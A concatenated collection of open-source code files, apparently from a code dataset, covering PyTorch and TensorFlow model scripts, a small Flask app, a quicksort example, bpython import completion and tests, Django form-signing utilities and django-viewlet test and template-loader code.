temp.append([next_cap, prob])
start_word = temp
# Sorting according to the probabilities
start_word = sorted(start_word, reverse=False, key=lambda l: l[1])
# Getting the top word
start_word = start_word[-beam_index:]
start_word = start_word[-1][0]
intermediate_caption = [idx2word[i] for i in start_word]
final_caption = []
for i in intermediate_caption:
if i != '<end>':
final_caption.append(i)
else:
break
final_caption = ' '.join(final_caption[1:])
return final_caption
```
#### File: NLPTutorials/language_model/language_model.py
```python
# ====================================================================================================== #
# The MIT License (MIT)
# Copyright (c) Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ====================================================================================================== #
import argparse
import math
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torchtext import data, datasets
class RNNModel(nn.Module):
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
super(RNNModel, self).__init__()
print("building RNN language model...")
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
if rnn_type in ['LSTM', 'GRU']:
self.rnn = getattr(nn, rnn_type)(ninp, nhid,nlayers, dropout=dropout)
else:
nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
self.decoder = nn.Linear(nhid, ntoken)
if tie_weights:
if nhid != ninp:
raise ValueError('tied: nhid and emsize must be equal')
self.decoder.weight = self.encoder.weight
self.init_weights()
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
def init_weights(self):
initrange = 0.1
nn.init.uniform_(self.encoder.weight, -initrange, initrange)
self.decoder.bias.data.zero_()
nn.init.uniform_(self.decoder.weight, -initrange, initrange)
def forward(self, input, hidden):
emb = self.drop(self.encoder(input))
output, hidden = self.rnn(emb, hidden)
output = self.drop(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
decoded = decoded.view(output.size(0), output.size(1), decoded.size(1))
return decoded, hidden
def init_hidden(self, bsz):
weight = next(self.parameters())
if self.rnn_type == 'LSTM':
return (weight.new_zeros(self.nlayers, bsz, self.nhid), weight.new_zeros(self.nlayers, bsz, self.nhid))
else:
return weight.new_zeros(self.nlayers, bsz, self.nhid)
def repackage_hidden(h):
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def get_wikitext_iter(args):
TEXT = data.Field()
train_data, val_data, test_data = datasets.WikiText2.splits(TEXT)
TEXT.build_vocab(train_data, min_freq=10)
train_iter, val_iter, test_iter = data.BPTTIterator.splits(
(train_data, val_data, test_data),
batch_size=args.batch_size, bptt_len=30, repeat=False)
vocab_size = len(TEXT.vocab)
return train_iter, val_iter, test_iter, vocab_size, TEXT.vocab
def evaluate(model, val_iter, vocab_size):
model.eval()
total_loss = 0
hidden = model.init_hidden(val_iter.batch_size)
for b, batch in enumerate(val_iter):
x, y = batch.text, batch.target
x = x.to(device)
y = y.to(device)
output, hidden = model(x, hidden)
loss = F.cross_entropy(output.view(-1, vocab_size), y.contiguous().view(-1))
total_loss += loss.item()
hidden = repackage_hidden(hidden)
return total_loss / len(val_iter)
def generate(args):
_, _, _, vocab_size, vocab= get_wikitext_iter(args)
model = RNNModel('LSTM', ntoken=vocab_size, ninp=600, nhid=600, nlayers=2, dropout=0.5).to(device)
model.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))
model.eval()
hidden = model.init_hidden(1)
input = torch.randint(vocab_size, (1, 1), dtype=torch.long).to(device)
word_list = []
for i in range(args.gen_word_len):
output, hidden = model(input, hidden)
word_weights = output.squeeze().div(1).exp().cpu()
word_idx = torch.multinomial(word_weights, 1)[0]
input.fill_(word_idx)
word = vocab.itos[word_idx]
word_list.append(word)
print(' '.join(word_list))
def train(args):
print("[!] preparing dataset...")
train_iter, val_iter, test_iter, vocab_size, _ = get_wikitext_iter(args)
print("[TRAIN]:%d\t[VALID]:%d\t[TEST]:%d\t[VOCAB]%d" % (len(train_iter), len(val_iter), len(test_iter), vocab_size))
print("[!] Instantiating models...")
model = RNNModel('LSTM', ntoken=vocab_size, ninp=600, nhid=600, nlayers=2, dropout=0.5).to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
print(model)
best_val_loss = None
for e in range(1, args.epochs+1):
model.train()
total_loss = 0
hidden = model.init_hidden(train_iter.batch_size)
for b, batch in enumerate(train_iter):
x, y = batch.text, batch.target
x = x.to(device)
y = y.to(device)
optimizer.zero_grad()
output, hidden = model(x, hidden)
hidden = repackage_hidden(hidden)
loss = F.cross_entropy(output.view(-1, vocab_size), y.contiguous().view(-1))
loss.backward()
# Prevent the exploding gradient problem in RNNs / LSTMs.
nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)
optimizer.step()
total_loss += loss.item()
if b % args.log_interval == 0 and b > 0:
cur_loss = total_loss / args.log_interval
print("[Epoch: %d, batch: %d] loss:%5.2f | pp:%5.2f" % (e, b, cur_loss, math.exp(cur_loss)))
total_loss = 0
val_loss = evaluate(model, val_iter, vocab_size)
print("[Epoch: %d] val-loss:%5.2f | val-pp:%5.2f" % (e, val_loss, math.exp(val_loss)))
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
print("[!] saving model")
if not os.path.isdir(args.model_dir):
os.makedirs(args.model_dir)
torch.save(model.state_dict(), os.path.join(args.model_dir, args.model_name))
best_val_loss = val_loss
print("[!] training done")
model.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))
test_loss = evaluate(model, test_iter, vocab_size)
print("test-loss:%5.2f | test-pp:%5.2f" % (test_loss, math.exp(test_loss)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Hyperparams')
parser.add_argument('--epochs', type=int, default=20, help='number of epochs for train')
parser.add_argument('--batch_size', type=int, default=20, help='batch_size')
parser.add_argument('--lr', type=float, default=0.0001, help='learning rate')
parser.add_argument('--grad_clip', type=float, default=0.25, help='max norm of the gradients')
parser.add_argument('--log_interval', type=int, default=100, help='print log every _')
parser.add_argument('--model_dir', type=str, default='.save/', help='directory to save the trained weights')
parser.add_argument('--model_name', type=str, default='lm_best_model.pt', help='the model file name')
parser.add_argument('--gen_word_len', type=int, default=15, help='word number of generations')
args = parser.parse_args()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train(args)
print("[!] generating...")
generate(args)
```
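A small illustration of why `repackage_hidden` detaches the hidden state between BPTT batches is sketched below; the shapes and the toy loss are arbitrary and unrelated to the WikiText setup above.
```python
# Toy BPTT loop: detach the LSTM state between batches so each backward()
# only traverses the current batch's graph (what repackage_hidden does above).
import torch
import torch.nn as nn

rnn = nn.LSTM(input_size=8, hidden_size=8, num_layers=1)
hidden = (torch.zeros(1, 4, 8), torch.zeros(1, 4, 8))
for step in range(3):
    x = torch.randn(5, 4, 8)                     # (seq_len, batch, features)
    out, hidden = rnn(x, hidden)
    out.pow(2).mean().backward()                 # stand-in loss
    hidden = tuple(h.detach() for h in hidden)   # omitting this raises a graph-reuse error
```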
#### File: pytorch/ScreenerNet/snet_mnist.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
from collections import OrderedDict
# =========== configuration ==============
M = 1.0
alpha = 0.01
def getLoader(phase, download=False):
if phase=='train':
trainset = torchvision.datasets.MNIST(root='.', train=True,
transform=transforms.ToTensor(), download=download)
loader = torch.utils.data.DataLoader(trainset, batch_size=64,
shuffle=True, num_workers=4)
else:
testset = torchvision.datasets.MNIST(root='.', train=False, transform=transforms.ToTensor(), download=download)
loader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)
return loader
def create_net():
net, snet = BaseNet(),Screener()
return net, snet
# =========== Module ====================
class BaseNet(nn.Module):
def __init__(self):
super(BaseNet, self).__init__()
self.conv1 = nn.Conv2d(1, 10, 5) # 28-5+1=24->12
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(10, 20, 5) # 12-5+1=8->4
self.dropout = nn.Dropout2d()
self.fc1 = nn.Linear(20 * 4 * 4, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.dropout(self.conv2(x))
x = self.pool(F.relu(x))
x = x.view(-1, 20 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
class Screener(nn.Module):
def __init__(self):
super(Screener, self).__init__()
self.model = nn.Sequential(OrderedDict([
('conv1',nn.Conv2d(1,4,3)),('act1',nn.ELU()), # 28-3+1=26
('conv2',nn.Conv2d(4,8,3)),('act2',nn.ELU()), # 26-3+1=24
('conv3',nn.Conv2d(8,16,3)),('act3',nn.ELU()), # 24-3+1=22
('conv4',nn.Conv2d(16,32,3)),('act4',nn.ELU())])) # 22-3+1=20
self.fc = nn.Linear(20*20*32,1)
def forward(self, x):
x = self.model(x)
x = x.view(-1, 20*20*32)
out = F.sigmoid(self.fc(x))
return out
```
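A quick shape check of the two modules defined above, assuming MNIST-sized input and that the definitions above are in scope; this only exercises the forward passes and says nothing about the ScreenerNet training objective, which is not shown in this file.
```python
# Forward-pass shape check for BaseNet and Screener via create_net().
import torch

net, snet = create_net()
x = torch.randn(2, 1, 28, 28)     # two fake 28x28 MNIST images
logits = net(x)                   # -> torch.Size([2, 10]) class scores
weights = snet(x)                 # -> torch.Size([2, 1]) per-sample weights in (0, 1)
print(logits.shape, weights.shape)
```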
#### File: StyleTransferTraining/src/export.py
```python
import argparse
import os
import shutil
import sys
import tensorflow as tf
sys.path.insert(0, '.')
from stylenet import net
from utils import info, error, fail
def export(args):
ckpt_dir = os.path.expanduser(args.ckpt_dir)
export_dir = os.path.expanduser(args.export_dir)
if os.path.isdir(export_dir):
info('Deleting the folder containing SavedModel at ' + export_dir)
shutil.rmtree(export_dir)
# Construct the serving graph
batch_shape = (args.batch_size, args.height, args.width, 3)
img_placeholder = tf.placeholder(tf.float32, shape=batch_shape)
preds = net(img_placeholder)
saver = tf.train.Saver()
builder = tf.saved_model.builder.SavedModelBuilder(export_dir)
with tf.Session() as sess:
# Restore the checkpoint
ckpt = tf.train.get_checkpoint_state(ckpt_dir)
if ckpt and ckpt.model_checkpoint_path:
info('Restoring from ' + ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
fail("Found no checkpoint in " + ckpt_dir)
# Write the SavedModel
info('Exporting SavedModel to ' + export_dir)
serving_signatures = {
'Transfer': #tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.saved_model.signature_def_utils.predict_signature_def(
{ tf.saved_model.signature_constants.PREDICT_INPUTS: img_placeholder },
{ tf.saved_model.signature_constants.PREDICT_OUTPUTS: preds }
)
}
builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING],
signature_def_map=serving_signatures,
clear_devices=True)
builder.save()
if __name__ == '__main__':
parser = argparse.ArgumentParser('Export SavedModel from the checkpoint of style transfer')
parser.add_argument('--ckpt_dir', type=str, required=True, help='Where the checkpoint is stored')
parser.add_argument('--export_dir', type=str, default='export', help='Where to write SavedModel')
parser.add_argument('--height', type=int, default=240, help='Image height')
    parser.add_argument('--width', type=int, default=320, help='Image width')
parser.add_argument('--batch_size', type=int, default=1, help='Batch size for inference')
args, _ = parser.parse_known_args()
export(args)
``` |
{
"source": "5mattmatt1/happythings",
"score": 2
} |
#### File: rest-api/src/main.py
```python
from flask import Flask
from flask_cors import CORS
from models import init_models
from routes import init_routes
def main():
app = Flask(__name__)
app.config['SECRET_KEY'] = 'some-secret-key'
cors = CORS(app)
    # Wire up the imported initializers before starting the server
    # (init_routes is assumed to take the app, mirroring init_models).
    init_models(app)
    init_routes(app)
    app.run()
if __name__ == "__main__":
main()
```
#### File: src/models/__init__.py
```python
from flask_sqlalchemy import SQLAlchemy
sa = SQLAlchemy()
def init_models(app):
sa.init_app(app)
``` |
{
"source": "5ME/Grokking-Algorithms",
"score": 4
} |
#### File: Grokking-Algorithms/04_quicksort/quicksort.py
```python
def quicksort(arr):
    if len(arr) < 2:  # base case
        return arr
    else:  # recursive case
        # pivot value
        pivot = arr[0]
        # elements less than or equal to the pivot
        less = [i for i in arr[1:] if i <= pivot]
        # elements greater than the pivot
        greater = [i for i in arr[1:] if i > pivot]
        # recursively quicksort each sub-array
        return quicksort(less) + [pivot] + quicksort(greater)
def main():
arr = [6, 5, 8, 3, 9, 7, 4]
print(quicksort(arr))
if __name__ == "__main__":
main()
``` |
{
"source": "5monkeys/bpython",
"score": 2
} |
#### File: bpython/bpython/importcompletion.py
```python
from __future__ import with_statement
import imp
import os
import sys
import warnings
try:
from warnings import catch_warnings
except ImportError:
import contextlib
@contextlib.contextmanager
def catch_warnings():
"""Stripped-down version of `warnings.catch_warnings()`
(available in Py >= 2.6)."""
filters = warnings.filters
warnings.filters = list(filters)
try:
yield
finally:
warnings.filters = filters
py3 = sys.version_info[:2] >= (3, 0)
# The cached list of all known modules
modules = set()
fully_loaded = False
def complete(line, cw):
"""Construct a full list of possibly completions for imports."""
if not cw:
return None
tokens = line.split()
if tokens[0] not in ['from', 'import']:
return None
completing_from = False
if tokens[0] == 'from':
if len(tokens) > 3:
if '.' in cw:
# This will result in a SyntaxError, so do not return
# any matches
return None
completing_from = True
cw = '%s.%s' % (tokens[1], cw)
elif len(tokens) == 3:
if 'import '.startswith(cw):
return ['import ']
else:
# Will result in a SyntaxError
return None
matches = list()
for name in modules:
if not (name.startswith(cw) and name.find('.', len(cw)) == -1):
continue
if completing_from:
name = name[len(tokens[1]) + 1:]
matches.append(name)
if completing_from and tokens[1] in sys.modules:
# from x import y -> search for attributes starting with y if
# x is in sys.modules
_, _, cw = cw.rpartition('.')
module = sys.modules[tokens[1]]
matches.extend(name for name in dir(module) if name.startswith(cw))
elif len(tokens) == 2:
# from x.y or import x.y -> search for attributes starting
# with y if x is in sys.modules and the attribute is also in
# sys.modules
module_name, _, cw = cw.rpartition('.')
if module_name in sys.modules:
module = sys.modules[module_name]
for name in dir(module):
if not name.startswith(cw):
continue
submodule_name = '%s.%s' % (module_name, name)
if submodule_name in sys.modules:
matches.append(submodule_name)
if not matches:
return []
return matches
def find_modules(path):
"""Find all modules (and packages) for a given directory."""
if not os.path.isdir(path):
# Perhaps a zip file
return
try:
filenames = os.listdir(path)
except EnvironmentError:
filenames = []
for name in filenames:
if not any(name.endswith(suffix[0]) for suffix in imp.get_suffixes()):
# Possibly a package
if '.' in name:
continue
elif os.path.isdir(os.path.join(path, name)):
# Unfortunately, CPython just crashes if there is a directory
# which ends with a python extension, so work around.
continue
for suffix in imp.get_suffixes():
if name.endswith(suffix[0]):
name = name[:-len(suffix[0])]
break
if py3 and name == "badsyntax_pep3120":
# Workaround for issue #166
continue
try:
with catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
fo, pathname, _ = imp.find_module(name, [path])
except (ImportError, SyntaxError):
continue
except UnicodeEncodeError:
# Happens with Python 3 when there is a filename in some
# invalid encoding
continue
else:
if fo is not None:
fo.close()
else:
# Yay, package
for subname in find_modules(pathname):
if subname != '__init__':
yield '%s.%s' % (name, subname)
yield name
def find_all_modules(path=None):
"""Return a list with all modules in `path`, which should be a list of
directory names. If path is not given, sys.path will be used."""
if path is None:
modules.update(sys.builtin_module_names)
path = sys.path
for p in path:
if not p:
p = os.curdir
for module in find_modules(p):
if not py3 and not isinstance(module, unicode):
try:
module = module.decode(sys.getfilesystemencoding())
except UnicodeDecodeError:
# Not importable anyway, ignore it
continue
modules.add(module)
yield
def find_coroutine():
global fully_loaded
if fully_loaded:
return None
try:
find_iterator.next()
except StopIteration:
fully_loaded = True
return True
def reload():
"""Refresh the list of known modules."""
modules.clear()
for _ in find_all_modules():
pass
find_iterator = find_all_modules()
```
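A hypothetical usage sketch of the completer above: the module cache has to be populated (via `reload()` or by draining `find_all_modules()`) before `complete()` returns anything useful. The expected outputs in the comments are illustrative, not exact.
```python
# Assumes the module above is importable as bpython.importcompletion.
from bpython import importcompletion

importcompletion.reload()                                    # fill the module cache
print(importcompletion.complete('import o', 'o'))            # e.g. ['os', 'operator', ...]
print(importcompletion.complete('from os import pa', 'pa'))  # e.g. ['path', 'pardir', ...]
```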
#### File: bpython/test/test_repl.py
```python
import os
import unittest
from itertools import islice
from bpython import config, repl
class TestHistory(unittest.TestCase):
def setUp(self):
self.history = repl.History('#%d' % x for x in range(1000))
def test_is_at_start(self):
self.history.first()
self.assertNotEqual(self.history.index, 0)
self.assertTrue(self.history.is_at_end)
self.history.forward()
self.assertFalse(self.history.is_at_end)
def test_is_at_end(self):
self.history.last()
self.assertEqual(self.history.index, 0)
self.assertTrue(self.history.is_at_start)
self.assertFalse(self.history.is_at_end)
def test_first(self):
self.history.first()
self.assertFalse(self.history.is_at_start)
self.assertTrue(self.history.is_at_end)
def test_last(self):
self.history.last()
self.assertTrue(self.history.is_at_start)
self.assertFalse(self.history.is_at_end)
def test_back(self):
self.assertEqual(self.history.back(), '#999')
self.assertNotEqual(self.history.back(), '#999')
self.assertEqual(self.history.back(), '#997')
for x in range(997):
self.history.back()
self.assertEqual(self.history.back(), '#0')
def test_forward(self):
self.history.first()
self.assertEqual(self.history.forward(), '#1')
self.assertNotEqual(self.history.forward(), '#1')
self.assertEqual(self.history.forward(), '#3')
        # 1000 entries in total; the three forward() calls above plus the final
        # assertion below account for 4, and starting from '#0' only 999 steps
        # are needed overall, hence the extra -1.
for x in range(1000 - 4 - 1):
self.history.forward()
self.assertEqual(self.history.forward(), '#999')
def test_append(self):
self.history.append('print "foo\n"\n')
self.history.append('\n')
self.assertEqual(self.history.back(), 'print "foo\n"')
def test_enter(self):
self.history.enter('#lastnumber!')
self.assertEqual(self.history.back(), '#999')
self.assertEqual(self.history.forward(), '#lastnumber!')
def test_reset(self):
self.history.enter('#lastnumber!')
self.history.reset()
self.assertEqual(self.history.back(), '#999')
self.assertEqual(self.history.forward(), '')
class TestMatchesIterator(unittest.TestCase):
def setUp(self):
self.matches = ['bobby', 'bobbies', 'bobberina']
self.matches_iterator = repl.MatchesIterator(current_word='bob',
matches=self.matches)
def test_next(self):
self.assertEqual(self.matches_iterator.next(), self.matches[0])
for x in range(len(self.matches) - 1):
self.matches_iterator.next()
self.assertEqual(self.matches_iterator.next(), self.matches[0])
        self.assertEqual(self.matches_iterator.next(), self.matches[1])
self.assertNotEqual(self.matches_iterator.next(), self.matches[1])
def test_previous(self):
self.assertEqual(self.matches_iterator.previous(), self.matches[2])
for x in range(len(self.matches) - 1):
self.matches_iterator.previous()
self.assertNotEqual(self.matches_iterator.previous(), self.matches[0])
self.assertEqual(self.matches_iterator.previous(), self.matches[1])
self.assertEqual(self.matches_iterator.previous(), self.matches[0])
def test_nonzero(self):
"""self.matches_iterator should be False at start,
        then True once we activate a match.
"""
self.assertFalse(self.matches_iterator)
self.matches_iterator.next()
self.assertTrue(self.matches_iterator)
def test_iter(self):
slice = islice(self.matches_iterator, 0, 9)
self.assertEqual(list(slice), self.matches * 3)
def test_current(self):
self.assertRaises(ValueError, self.matches_iterator.current)
self.matches_iterator.next()
self.assertEqual(self.matches_iterator.current(), self.matches[0])
def test_update(self):
slice = islice(self.matches_iterator, 0, 3)
self.assertEqual(list(slice), self.matches)
newmatches = ['string', 'str', 'set']
self.matches_iterator.update('s', newmatches)
newslice = islice(newmatches, 0, 3)
self.assertNotEqual(list(slice), self.matches)
self.assertEqual(list(newslice), newmatches)
class TestRepl(repl.Repl):
def __init__(self):
config_struct = config.Struct()
config.loadini(config_struct, os.devnull)
repl.Repl.__init__(self, repl.Interpreter(), config_struct)
self.input_line = ""
def current_line(self):
return self.input_line
class TestArgspec(unittest.TestCase):
def setUp(self):
self.repl = TestRepl()
self.repl.push("def spam(a, b, c):\n", False)
self.repl.push(" pass\n", False)
self.repl.push("\n", False)
def setInputLine(self, line):
"""Set current input line of the test REPL."""
self.repl.input_line = line
def test_func_name(self):
for (line, expected_name) in [("spam(", "spam"),
("spam(map([]", "map"),
("spam((), ", "spam")]:
self.setInputLine(line)
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, expected_name)
def test_syntax_error_parens(self):
for line in ["spam(]", "spam([)", "spam())"]:
self.setInputLine(line)
# Should not explode
self.repl.get_args()
def test_kw_arg_position(self):
self.setInputLine("spam(a=0")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "a")
self.setInputLine("spam(1, b=1")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "b")
self.setInputLine("spam(1, c=2")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.argspec[3], "c")
def test_lambda_position(self):
self.setInputLine("spam(lambda a, b: 1, ")
self.assertTrue(self.repl.get_args())
self.assertTrue(self.repl.argspec)
# Argument position
self.assertEqual(self.repl.argspec[3], 1)
def test_name_in_assignment_without_spaces(self):
# Issue #127
self.setInputLine("x=range(")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, "range")
self.setInputLine("{x:range(")
self.assertTrue(self.repl.get_args())
self.assertEqual(self.repl.current_func.__name__, "range")
self.setInputLine("foo(1, 2, x,range(")
self.assertEqual(self.repl.current_func.__name__, "range")
def test_nonexistent_name(self):
self.setInputLine("spamspamspam(")
self.assertFalse(self.repl.get_args())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "5monkeys/django-formapi",
"score": 2
} |
#### File: django-formapi/formapi/utils.py
```python
import hashlib
import hmac
import uuid
from urllib.parse import quote
from django.utils.encoding import force_str, smart_bytes, smart_str
def get_sign(secret, querystring=None, **params):
"""
Return sign for querystring.
Logic:
- Sort querystring by parameter keys and by value if two or more parameter keys share the same name
- URL encode sorted querystring
- Generate a hex digested hmac/sha1 hash using given secret
"""
if querystring:
params = dict(param.split("=") for param in querystring.split("&"))
sorted_params = []
for key, value in sorted(params.items(), key=lambda x: x[0]):
if isinstance(value, (bytes, str)):
sorted_params.append((key, value))
else:
try:
value = list(value)
except TypeError as e:
assert "is not iterable" in smart_str(e)
value = smart_bytes(value)
sorted_params.append((key, value))
else:
sorted_params.extend((key, item) for item in sorted(value))
return get_pairs_sign(secret, sorted_params)
def get_pairs_sign(secret, sorted_pairs):
param_list = ("=".join((field, force_str(value))) for field, value in sorted_pairs)
validation_string = smart_bytes("&".join(param_list))
validation_string = smart_bytes(quote(validation_string))
return hmac.new(smart_bytes(secret), validation_string, hashlib.sha1).hexdigest()
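# Illustration (not part of the original module): the querystring form and the
# keyword form below should yield the same signature, since both are reduced to
# the same sorted key/value pairs before hashing.
#   get_sign('secret', 'b=2&a=1') == get_sign('secret', a='1', b='2')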
def prepare_uuid_string(value, default=None):
if isinstance(value, uuid.UUID):
value = value.hex
if not value:
return default
value = str(value).replace("-", "").strip().lower()
return value
``` |
{
"source": "5monkeys/django-viewlet",
"score": 2
} |
#### File: 5monkeys/django-viewlet/run_tests.py
```python
import os
import sys
import warnings
import django
from django.conf import settings
# We do it first before Django loads, and then again in tests
warnings.simplefilter("error")
warnings.filterwarnings("ignore", module="cgi")
ROOT = os.path.join(os.path.dirname(__file__), "viewlet/tests")
def main():
conf = {
"DEBUG": True,
"TEMPLATE_DEBUG": True,
"INSTALLED_APPS": [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.flatpages",
"viewlet",
"viewlet.tests",
],
"MIDDLEWARE_CLASSES": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
],
"MEDIA_ROOT": "/tmp/viewlet/media",
"STATIC_ROOT": "/tmp/viewlet/static",
"MEDIA_URL": "/media/",
"STATIC_URL": "/static/",
"ROOT_URLCONF": "viewlet.tests.urls",
"SECRET_KEY": "iufoj=mibkpdz*%bob952x(%49rqgv8gg45k36kjcg76&-y5=!",
"TEMPLATE_CONTEXT_PROCESSORS": [
"django.core.context_processors.request",
],
"TEMPLATES": [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"DIRS": (os.path.join(ROOT, "template_dir"),),
"OPTIONS": {
"debug": True,
"context_processors": [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
}
],
"JINJA2_TEMPLATES": [
{
"BACKEND": "django.template.backends.jinja2.Jinja2",
"APP_DIRS": True,
"DIRS": (
os.path.join(ROOT, "template_dir"),
os.path.join(ROOT, "templates"), # or change app_dirname
),
"OPTIONS": {
"extensions": [
"viewlet.loaders.jinja2_loader.ViewletExtension",
],
},
}
],
"JINJA2_ENVIRONMENT_OPTIONS": {"optimized": False}, # Coffin config
"JINJA_CONFIG": {"autoescape": True}, # Jingo config
}
conf["MIDDLEWARE"] = conf.pop("MIDDLEWARE_CLASSES")
conf.pop("TEMPLATE_DEBUG")
conf.pop("TEMPLATE_CONTEXT_PROCESSORS")
conf.update(
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
}
)
conf.update(
CACHES={"default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"}}
)
settings.configure(**conf)
django.setup()
from django.test.utils import get_runner
test_runner = get_runner(settings)(verbosity=2, interactive=True)
failures = test_runner.run_tests(["viewlet"])
sys.exit(failures)
if __name__ == "__main__":
main()
```
#### File: django-viewlet/viewlet/exceptions.py
```python
from django.template import TemplateSyntaxError
DEPRECATED_KEY_FORMAT_MESSAGE = (
"Key argument format has been changed. It can be a function or "
"a string containing `{args}`"
)
WRONG_KEY_FORMAT_MESSAGE = (
"If you want to use your custom key for a viewlet which has arguments, "
"please add `{args}` to the key where the arguments will be inserted."
)
class ViewletException(Exception):
pass
class UnknownViewlet(TemplateSyntaxError):
pass
class DeprecatedKeyFormat(ViewletException):
def __init__(self, message=None):
ViewletException.__init__(self, message or DEPRECATED_KEY_FORMAT_MESSAGE)
class WrongKeyFormat(ViewletException):
def __init__(self, message=None):
ViewletException.__init__(self, message or WRONG_KEY_FORMAT_MESSAGE)
```
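The two messages above encode a rule about custom cache keys that the test suite near the end of this section exercises. A short illustrative sketch follows; the decorated functions are made up and assume a configured Django project where the `viewlet` package is importable.
```python
# Illustrative only; mirrors the key-format tests in test_viewlet.py below.
from viewlet import viewlet

@viewlet(timeout=10, key='greeting')           # fine: the viewlet takes no extra args
def hello(context):
    return 'hello'

@viewlet(timeout=10, key='greeting:{args}')    # fine: call args are joined into the key
def hello_name(context, name):
    return 'hello %s' % name

# key='greeting(%s)' raises DeprecatedKeyFormat, and a plain key='greeting' on a
# viewlet that takes arguments raises WrongKeyFormat when the cache key is built.
```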
#### File: viewlet/loaders/jinja2_loader.py
```python
from importlib import import_module
from django.conf import settings as django_settings
from jinja2 import ChoiceLoader, FileSystemLoader, PackageLoader, nodes
from jinja2.environment import Environment
from jinja2.ext import Extension
from jinja2.filters import do_mark_safe
import viewlet
from ..conf import settings
class ViewletExtension(Extension):
tags = {"viewlet"}
def parse(self, parser):
lineno = next(parser.stream).lineno
viewlet_args = []
name = None
first = True
while parser.stream.current.type != "block_end":
if not first:
parser.stream.expect("comma")
viewlet_args.append(parser.parse_expression())
else:
name = parser.parse_expression()
first = False
context = nodes.ContextReference()
return nodes.CallBlock(
self.call_method(
"_call_viewlet", args=[name, context, nodes.List(viewlet_args)]
),
[],
[],
[],
).set_lineno(lineno)
def _call_viewlet(self, name, context, viewlet_args, caller=None):
context = context.get_all()
return mark_safe(viewlet.call(name, context, *viewlet_args))
def create_env():
x = (
(FileSystemLoader, django_settings.TEMPLATE_DIRS),
(PackageLoader, django_settings.INSTALLED_APPS),
)
loaders = [loader(p) for loader, places in x for p in places]
env = Environment(loader=ChoiceLoader(loaders), extensions=[ViewletExtension])
return env
_env = None
def get_env():
global _env
if _env:
return _env
jinja2_env_module = settings.VIEWLET_JINJA2_ENVIRONMENT
module, environment = jinja2_env_module.rsplit(".", 1)
imported_module = import_module(module)
jinja2_env = getattr(imported_module, environment)
if callable(jinja2_env):
jinja2_env = jinja2_env()
_env = jinja2_env
return jinja2_env
def render_to_string(template_name, context):
return get_template(template_name).render(context)
def get_template(template_name):
return get_env().get_template(template_name)
def mark_safe(value):
return do_mark_safe(value)
```
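A minimal sketch of rendering through the `ViewletExtension` above, assuming a configured Django project and a registered viewlet; the `hello_world` viewlet here is made up for the example.
```python
import viewlet
from jinja2 import Environment
from viewlet.loaders.jinja2_loader import ViewletExtension

@viewlet.viewlet(timeout=0)
def hello_world(context):
    return 'Hello world!'

env = Environment(extensions=[ViewletExtension])
print(env.from_string("<h1>{% viewlet 'hello_world' %}</h1>").render())
# <h1>Hello world!</h1>
```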
